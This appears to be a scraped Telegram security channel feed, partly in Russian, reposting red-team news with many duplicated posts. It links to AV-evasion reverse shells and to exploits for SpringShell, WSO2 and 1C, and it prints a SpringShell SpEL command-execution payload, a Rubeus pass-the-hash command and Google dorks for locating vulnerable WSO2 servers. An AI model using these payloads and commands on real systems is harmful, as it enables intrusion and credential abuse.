Forwarded from APT
PSSW100AVB
This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)
https://github.com/tihanyin/PSSW100AVB
#av #evasion #amsi #powershell #ps1
This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)
https://github.com/tihanyin/PSSW100AVB
#av #evasion #amsi #powershell #ps1
👍1
Forwarded from APT
SpringShell: Spring Core RCE
(CVE-2022-22963)
PoC Payload:
https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Exploit:
https://github.com/craig/SpringCore0day
(CVE-2022-22963)
PoC Payload:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")
Research:https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Exploit:
https://github.com/craig/SpringCore0day
Forwarded from APT
OverPass-the-Hash in 1C Enterprise
To gain access to 1C Enterprise, you need a username and password. In case 1C works with LDAP authentication and you only have the user's NTLM hash, you can use Rubeus to launch 1C using the OverPass-the-Hash attack. Thus, you can access 1C Enterprise without having a password in the plaintext.
If the compromised user has permissions to run "External data processors", you can get a reverse shell of the 1C server.
https://github.com/KraudSecurity/1C-Exploit-Kit/tree/master/1C-Shell
#1c #pth #rubeus #ad
To gain access to 1C Enterprise, you need a username and password. In case 1C works with LDAP authentication and you only have the user's NTLM hash, you can use Rubeus to launch 1C using the OverPass-the-Hash attack. Thus, you can access 1C Enterprise without having a password in the plaintext.
Invoke-Rubeus -Command "asktgt /user:i.ivanov /domain:APTNOTES.LOCAL /rc4:A87F3A337D73085C45F9416BE5787D86 /createnetonly:C:\1cestart.exe /show"
Bonus:If the compromised user has permissions to run "External data processors", you can get a reverse shell of the 1C server.
https://github.com/KraudSecurity/1C-Exploit-Kit/tree/master/1C-Shell
#1c #pth #rubeus #ad
CrowdSec - незаметное перенапревление зловредного траффика подальше в лес, к заранее приготовленным медовым ульям👺 🐝🐝🐝
#soc #blueteam #defensive
https://youtu.be/2OEDFCo1VXY
#soc #blueteam #defensive
https://youtu.be/2OEDFCo1VXY
YouTube
Ippsecs First Look and Setting up CrowdSec - Stealthfully Forward Malicious Users to Honeypots
00:00 - Intro talking about crowdsec and its multiplayer firewall
01:04 - Showing my setup, 3 web servers, 2 attack servers
02:20 - Installing Crowdsec
03:30 - Going over the command line interface, CSCLI showing decisions
04:10 - Showing descisions -a to…
01:04 - Showing my setup, 3 web servers, 2 attack servers
02:20 - Installing Crowdsec
03:30 - Going over the command line interface, CSCLI showing decisions
04:10 - Showing descisions -a to…
Для тех кто ищет какой то особый «супер секретный путь в мир хакинга» посмотрите это видео.
Вкратце, нет никакого пути - изучай всё что тебе интересно & have fun! 😉
https://www.youtube.com/watch?v=2TofunAI6fU
Вкратце, нет никакого пути - изучай всё что тебе интересно & have fun! 😉
https://www.youtube.com/watch?v=2TofunAI6fU
YouTube
The Secret step-by-step Guide to learn Hacking
totally clickbait. but also not clickbait. I don't know where to start hacking, there is no guide to learn this stuff. But I hope you still have a plan now!
Get the LiveOverflow Font: https://shop.liveoverflow.com (advertisement)
Checkout: https://live…
Get the LiveOverflow Font: https://shop.liveoverflow.com (advertisement)
Checkout: https://live…
👍2❤1
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
WSO2 RCE (CVE-2022-29464)
Critical vulnerability on WSO2 discovered by Orange Tsai. the vulnerability is an unauthenticated unrestricted arbitrary file upload which which allows unauthenticated attackers to gain RCE on WSO2 servers via uploading malicious JSP files.
Google Dorks:
#wso2 #rce #exploit
Critical vulnerability on WSO2 discovered by Orange Tsai. the vulnerability is an unauthenticated unrestricted arbitrary file upload which which allows unauthenticated attackers to gain RCE on WSO2 servers via uploading malicious JSP files.
Google Dorks:
inurl:"/carbon/admin/login.jsp"https://github.com/hakivvi/CVE-2022-29464
inurl:"/authenticationendpoint/login.do"
inurl:"devportal/apis"
intitle:"API Publisher- Login"
intitle:"WSO2 Management Console"
#wso2 #rce #exploit
Forwarded from Ralf Hacker Channel (Ralf Hacker)
@snovvcrash описал разные способы дампа LSASS
https://habr.com/ru/company/angarasecurity/blog/661341/
#art #pentest #redteam
https://habr.com/ru/company/angarasecurity/blog/661341/
#art #pentest #redteam
Forwarded from PT SWARM
💎Cisco fixed an Authenticated Heap Overflow Vulnerability (CVE-2022-20737) in Cisco ASA found by our researcher Nikita Abramov.
The vulnerability allows an attacker to cause a DoS or to obtain portions of process memory from the device.
The advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssl-vpn-heap-zLX3FdX
The vulnerability allows an attacker to cause a DoS or to obtain portions of process memory from the device.
The advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssl-vpn-heap-zLX3FdX
Forwarded from APT
NTLMRelay2Self over HTTP
Just a walkthrough of how to escalate privileges locally by forcing the system you landed initial access on to reflectively authenticate over HTTP to itself and forward the received connection to an HTTP listener (ntlmrelayx) configured to relay to DC servers over LDAP/LDAPs for either setting shadow credentials or configuring RBCD.
https://github.com/med0x2e/NTLMRelay2Self
#ad #ntlm #relay #rbcd #redteam
Just a walkthrough of how to escalate privileges locally by forcing the system you landed initial access on to reflectively authenticate over HTTP to itself and forward the received connection to an HTTP listener (ntlmrelayx) configured to relay to DC servers over LDAP/LDAPs for either setting shadow credentials or configuring RBCD.
https://github.com/med0x2e/NTLMRelay2Self
#ad #ntlm #relay #rbcd #redteam
GitHub
GitHub - med0x2e/NTLMRelay2Self: An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav).
An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav). - med0x2e/NTLMRelay2Self
Forwarded from Thatskriptkid
r0crewKZ совместно с SolveChat расскажут доклады в Алматы, в Lenore Pub, 12 мая, в 19:00
Доклады:
1. Александр Ошлаков - "Пишем код в функциональном стиле. Как и главное Зачем"
2. Евгения Цыбренко - "Гибридные Криптобиржи: взгляд изнутри"
3. Thatskriptkid - "Решаем андроид крякми с помощью IDA"
4. novitoll - "gnuradio: Eins, zwei (G), Polizei, Drei (G), vier (G), Grenadier, Fünf (G)?"
5. Sh3lldon- Патчинг bin, elf и pe файлов с гидрой
6. sysadmin "Аваренесс о неявных превентивных сервисах"
Бесплатно, без стрима, без записи.
В конце мая доклады расскажем в Астане
Доклады:
1. Александр Ошлаков - "Пишем код в функциональном стиле. Как и главное Зачем"
2. Евгения Цыбренко - "Гибридные Криптобиржи: взгляд изнутри"
3. Thatskriptkid - "Решаем андроид крякми с помощью IDA"
4. novitoll - "gnuradio: Eins, zwei (G), Polizei, Drei (G), vier (G), Grenadier, Fünf (G)?"
5. Sh3lldon- Патчинг bin, elf и pe файлов с гидрой
6. sysadmin "Аваренесс о неявных превентивных сервисах"
Бесплатно, без стрима, без записи.
В конце мая доклады расскажем в Астане
👍4
Forwarded from APT
📜 Abuse AD CS via dNSHostName Spoofing
This blog covers the technical details of CVE-2022-26923. Active Directory Domain Services Elevation of Privilege Vulnerability via AD CS dNSHostName Spoofing.
https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
#ad #adcs #privesc #redteam
This blog covers the technical details of CVE-2022-26923. Active Directory Domain Services Elevation of Privilege Vulnerability via AD CS dNSHostName Spoofing.
https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
#ad #adcs #privesc #redteam
Forwarded from b4tr_ch
Небольшой подкаст с ребятами из ГТС и @mortychannel. Приятного просмотра/прослушивания ☺️
https://www.youtube.com/watch?v=3DiZWmIWSlM
https://www.youtube.com/watch?v=3DiZWmIWSlM
Forwarded from RedTeam brazzers
Через 30 минут буду выступать на PHD с докладом по ACL. Будет online трансляция, заходите, смотрите))